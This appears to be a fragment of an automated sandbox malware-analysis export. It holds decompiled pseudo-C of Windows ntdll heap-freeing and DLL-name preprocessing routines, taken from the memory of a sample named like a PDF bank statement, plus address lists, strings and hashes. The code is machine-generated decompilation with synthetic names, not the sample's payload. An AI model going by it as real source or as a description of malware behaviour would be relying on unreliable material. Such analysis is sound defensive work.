								E3407096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = E34073C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E3411F13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E34059E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E3405B9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x34156960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												E3405B910();
											} else {
												E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E3405B910();
											__eflags =  *0x34155da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E3411FC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											E34125FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									E34070B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = E34073C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = E34073C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3411F058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = E34073C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = E34073C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E3411F058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x34156960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x34156960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												E3405B910();
											} else {
												E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											E3405B910();
											__eflags =  *0x34155da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E3411FC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											E34125FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									E34070B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							E3407096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							E34070B10(_t547, _v60, _v24);
							_t274 = E34073C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = E34073C40();
									if(__eflags != 0) {
										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3411F058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = E34073C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = E34073C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = E3405FABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = E34073C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E3411F13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E34071EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E34070B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E3405F6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}

0x3405f113
0x3405f120
0x3405f123
0x3405f127
0x3405f137
0x3405f13b
0x340bdc64
0x340bdc67
0x3405f1d5
0x3405f1d5
0x3405f1c7
0x3405f1cd
0x3405f1cd
0x3405f144
0x340bdc75
0x340bdc79
0x340bdc7b
0x340bdc8d
0x340bdc92
0x340bdc94
0x340bdc9a
0x340bdc9a
0x340bdc9a
0x340bdc9a
0x340bdc94
0x340bdca0
0x340bdca3
0x340bdca5
0x3405f202
0x3405f202
0x3405f205
0x3405f207
0x340bdcae
0x3405f20d
0x3405f21b
0x3405f21b
0x3405f21b
0x3405f228
0x3405f22a
0x3405f22e
0x3405f231
0x3405f23f
0x3405f243
0x3405f248
0x3405f24f
0x3405f256
0x3405f259
0x3405f263
0x3405f269
0x3405f26f
0x3405f275
0x3405f278
0x3405f27d
0x3405f45b
0x3405f461
0x3405f461
0x3405f283
0x3405f28d
0x3405f291
0x3405f292
0x3405f295
0x3405f3be
0x3405f3be
0x3405f3be
0x3405f29d
0x3405f2a1
0x3405f494
0x3405f498
0x3405f49d
0x3405f4a1
0x3405f4a5
0x340bdcb5
0x340bdcb7
0x00000000
0x00000000
0x340bdcbd
0x3405f4ab
0x3405f4b2
0x340bdcc2
0x340bdcc4
0x340bdcca
0x340bdcd0
0x340bdcd4
0x340bdcf3
0x340bdcf8
0x340bdcd6
0x340bdceb
0x340bdcf0
0x340bdcfe
0x340bdd03
0x340bdd08
0x340bdd10
0x340bdd12
0x340bdd17
0x340bdd17
0x340bdd1c
0x340bdd20
0x340bdd20
0x340bdcc4
0x3405f4b8
0x3405f4be
0x3405f4c1
0x3405f4c5
0x3405f4c7
0x3405f4cb
0x3405f4cd
0x340bdd28
0x340bdd28
0x3405f4d9
0x3405f4d9
0x3405f4dd
0x3405f4e1
0x340bdd30
0x340bdd37
0x00000000
0x00000000
0x340bdd3d
0x340be0fe
0x340be0fe
0x00000000
0x00000000
0x340be104
0x340be10a
0x340be10e
0x340be12d
0x340be132
0x340be110
0x340be125
0x340be12a
0x340be138
0x340be13d
0x340be142
0x340be14a
0x340be14c
0x340be151
0x340be151
0x00000000
0x3405f4e7
0x3405f4f5
0x3405f4fa
0x3405f4fc
0x340bdd44
0x340bdd44
0x340bdd4a
0x340bdd4f
0x340be159
0x340be159
0x3405f1d2
0x3405f1d2
0x3405f1d4
0x3405f1d4
0x00000000
0x3405f1d4
0x340bdd6d
0x340be156
0x340be156
0x00000000
0x340be156
0x3405f502
0x3405f507
0x3405f50c
0x3405f50e
0x340bdd80
0x3405f514
0x3405f514
0x3405f514
0x3405f516
0x3405f519
0x340bdd8a
0x340bdd90
0x340bdd97
0x340bdda9
0x340bdda9
0x340bdd97
0x3405f51f
0x3405f523
0x3405f529
0x3405f52c
0x3405f532
0x340bddb3
0x340bddb3
0x3405f53c
0x3405f541
0x3405f54b
0x3405f550
0x3405f55c
0x3405f563
0x3405f56d
0x3405f570
0x3405f575
0x3405f577
0x3405f577
0x3405f577
0x3405f577
0x3405f57d
0x3405f582
0x340bddc2
0x340bddca
0x340bddce
0x340bddda
0x340bddde
0x340bdeaf
0x340bdeb3
0x340bdec1
0x340bdec7
0x340bdec7
0x340bdde4
0x340bdde8
0x340bddea
0x340bdded
0x340bddf7
0x340bddfa
0x340bddfc
0x340bde02
0x340bde08
0x340bde0a
0x340bde0d
0x340bde0f
0x340bde15
0x340bde18
0x340bde37
0x340bde3c
0x340bde1a
0x340bde2f
0x340bde34
0x340bde42
0x340bde47
0x340bde4d
0x340bde53
0x340bde55
0x340bde5a
0x340bde5a
0x340bde5f
0x340bde5f
0x340bde0d
0x340bde63
0x340bde66
0x340bde69
0x340bde72
0x340bde73
0x340bde77
0x340bde7c
0x340bde7e
0x340bde7f
0x340bde80
0x340bde81
0x340bde87
0x340bde88
0x340bde8d
0x340bde91
0x340bde91
0x340bde95
0x340bde95
0x340bde9d
0x340bdea0
0x340bdea5
0x340bdea5
0x340bddde
0x3405f588
0x3405f58d
0x3405f58f
0x340bded7
0x3405f595
0x3405f595
0x3405f595
0x3405f597
0x3405f59a
0x340bdee1
0x340bdeea
0x340bdef0
0x340bdefb
0x340bdefd
0x340bdf08
0x340bdf08
0x340bdf08
0x340bdf2b
0x340bdf2b
0x340bdef0
0x3405f5a0
0x3405f5a5
0x3405f5aa
0x3405f5af
0x3405f5b1
0x340bdf3e
0x3405f5b7
0x3405f5b7
0x3405f5b7
0x3405f5b9
0x3405f5bc
0x340bdf4a
0x340bdf4c
0x340bdf57
0x340bdf57
0x340bdf57
0x340bdf5c
0x340bdf5d
0x340bdf61
0x340bdf7c
0x340bdf88
0x340bdf89
0x340bdf8d
0x340bdf8d
0x00000000
0x3405f5bc
0x3405f4e1
0x3405f2a7
0x3405f2ad
0x3405f2b6
0x3405f2ba
0x3405f2bc
0x340bdf97
0x340bdf9d
0x340bdf9d
0x3405f2c4
0x3405f2c7
0x3405f2cb
0x3405f2cd
0x3405f2d2
0x3405f2d6
0x3405f3c8
0x3405f3c8
0x3405f2dc
0x3405f2e1
0x3405f2e3
0x340be0ed
0x340be0f3
0x00000000
0x00000000
0x340be0f9
0x00000000
0x340be0f9
0x3405f2e9
0x3405f2eb
0x3405f2ef
0x3405f2f3
0x3405f302
0x3405f302
0x3405f304
0x3405f346
0x3405f346
0x3405f348
0x3405f34c
0x3405f3ea
0x3405f3f2
0x3405f3f6
0x3405f402
0x3405f406
0x340be046
0x340be049
0x340be057
0x340be05d
0x340be05d
0x3405f40c
0x3405f410
0x3405f413
0x3405f423
0x3405f426
0x3405f428
0x3405f42e
0x3405f434
0x340bdfe4
0x340bdfe7
0x340bdfed
0x340bdff3
0x340bdff6
0x340be015
0x340be01a
0x340bdff8
0x340be00d
0x340be012
0x340be020
0x340be025
0x340be02b
0x340be031
0x340be033
0x340be038
0x340be038
0x340be03d
0x340be03d
0x340bdfe7
0x3405f43a
0x3405f43d
0x3405f440
0x3405f442
0x3405f470
0x3405f471
0x3405f475
0x3405f47a
0x3405f47c
0x3405f47d
0x3405f47e
0x3405f47f
0x3405f482
0x3405f483
0x3405f488
0x3405f48c
0x3405f48c
0x3405f444
0x3405f444
0x3405f444
0x3405f446
0x3405f451
0x3405f451
0x3405f406
0x3405f36b
0x3405f37a
0x3405f37f
0x3405f384
0x3405f389
0x3405f38b
0x340be06d
0x3405f391
0x3405f391
0x3405f391
0x3405f393
0x3405f396
0x340be077
0x340be080
0x340be086
0x340be091
0x340be093
0x340be09e
0x340be09e
0x340be09e
0x340be0bb
0x340be0bb
0x340be086
0x3405f39c
0x3405f3a1
0x3405f3a6
0x3405f3a8
0x340be0ce
0x3405f3ae
0x3405f3ae
0x3405f3ae
0x3405f3b0
0x3405f3b3
0x00000000
0x3405f3b9
0x340be0dd
0x340be0df
0x340bdf70
0x340bdf70
0x340bdf70
0x340bdf79
0x340bdf7a
0x340bdf7b
0x00000000
0x340bdf7b
0x3405f3b3
0x3405f306
0x3405f31a
0x3405f31f
0x3405f321
0x00000000
0x00000000
0x3405f327
0x3405f32c
0x3405f32e
0x340bdfaf
0x3405f334
0x3405f334
0x3405f334
0x3405f339
0x3405f33c
0x340bdfb9
0x340bdfc2
0x340bdfc8
0x340bdfda
0x340bdfda
0x340bdfc8
0x3405f342
0x00000000
0x3405f342
0x3405f2f9
0x3405f2fc
0x3405f3d0
0x3405f3d2
0x00000000
0x00000000
0x3405f3d8
0x3405f3db
0x00000000
0x3405f3e1
0x00000000
0x3405f3e1
0x3405f3db
0x00000000
0x3405f2fc
0x3405f14a
0x3405f150
0x340bdc6e
0x00000000
0x340bdc6e
0x3405f159
0x3405f15b
0x3405f162
0x3405f1d0
0x00000000
0x3405f17b
0x3405f184
0x3405f189
0x3405f18c
0x3405f18e
0x3405f19e
0x00000000
0x3405f1a0
0x3405f1a3
0x3405f1b1
0x3405f1ba
0x3405f1be
0x3405f1c5
0x3405f1dc
0x3405f1e4
0x3405f1e9
0x3405f1eb
0x3405f1ef
0x3405f1f4
0x3405f1fa
0x3405f1fa
0x3405f1eb
0x00000000
0x3405f1c5
0x3405f19e

Strings

HEAP[%wZ]: , xrefs: 340BDCE6, 340BDE2A, 340BE008, 340BE120
HEAP: , xrefs: 340BDCF3, 340BDE37, 340BE015, 340BE12D
(!TrailingUCR), xrefs: 340BE138
(LONG)FreeEntry->Size > 1, xrefs: 340BE020
((LONG)FreeEntry->Size > 1), xrefs: 340BDE42
(UCRBlock != NULL), xrefs: 340BDCFE

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: b3a95e8cf326e8ef5f57c35c9b7ca7f26dfab947a8d4f7a866fbfc63470e4fd2
Instruction ID: 519d7c4a38ff2fc33da889b57a463add88ec9b0d9e1b9d3c61dadaebf6e411e4
Opcode Fuzzy Hash: b3a95e8cf326e8ef5f57c35c9b7ca7f26dfab947a8d4f7a866fbfc63470e4fd2
Instruction Fuzzy Hash: 9242DC75318782DFE705CF28C980B5ABBE9FF88248F0449EDE4958B261DB38D941CB56

Uniqueness

Uniqueness Score: -1.00%

Function 3407B0D0 Relevance: 7.8, Strings: 6, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E3407B0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E3407C4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x341537c0 & 0x00000005;
						if(( *0x341537c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E340DE692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							E3406FCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E3407C7E7(_t183, 0x3403116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E34075D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										E340A88C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = E340E3C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						E340A88C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = L3409432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E3407C7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E340823C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E3407DF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E3408015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E3407DF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E340A5050(0,  &_v44, E340701C0());
						E3407C7E7(_t183,  &_v44);
						E3407C7E7(_t183, 0x34031008);
						_t184 = E3407C7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x341537c0 & 0x00000003;
							if(( *0x341537c0 & 0x00000003) != 0) {
								_push(_t184);
								E340DE692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x341537c0 & 0x00000010;
							if(( *0x341537c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E3407C4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x34155d70 == 0) {
								_t136 = E34079870("true", _t161, 0x3403116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E340823C4( &_v36, _t183, __eflags);
									E3408E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}

0x3407b0de
0x3407b0e3
0x3407b0e5
0x3407b0ef
0x340c81db
0x3407b0f5
0x3407b0f5
0x3407b0f5
0x3407b0f9
0x3407b0fc
0x3407b0fe
0x3407b100
0x3407b109
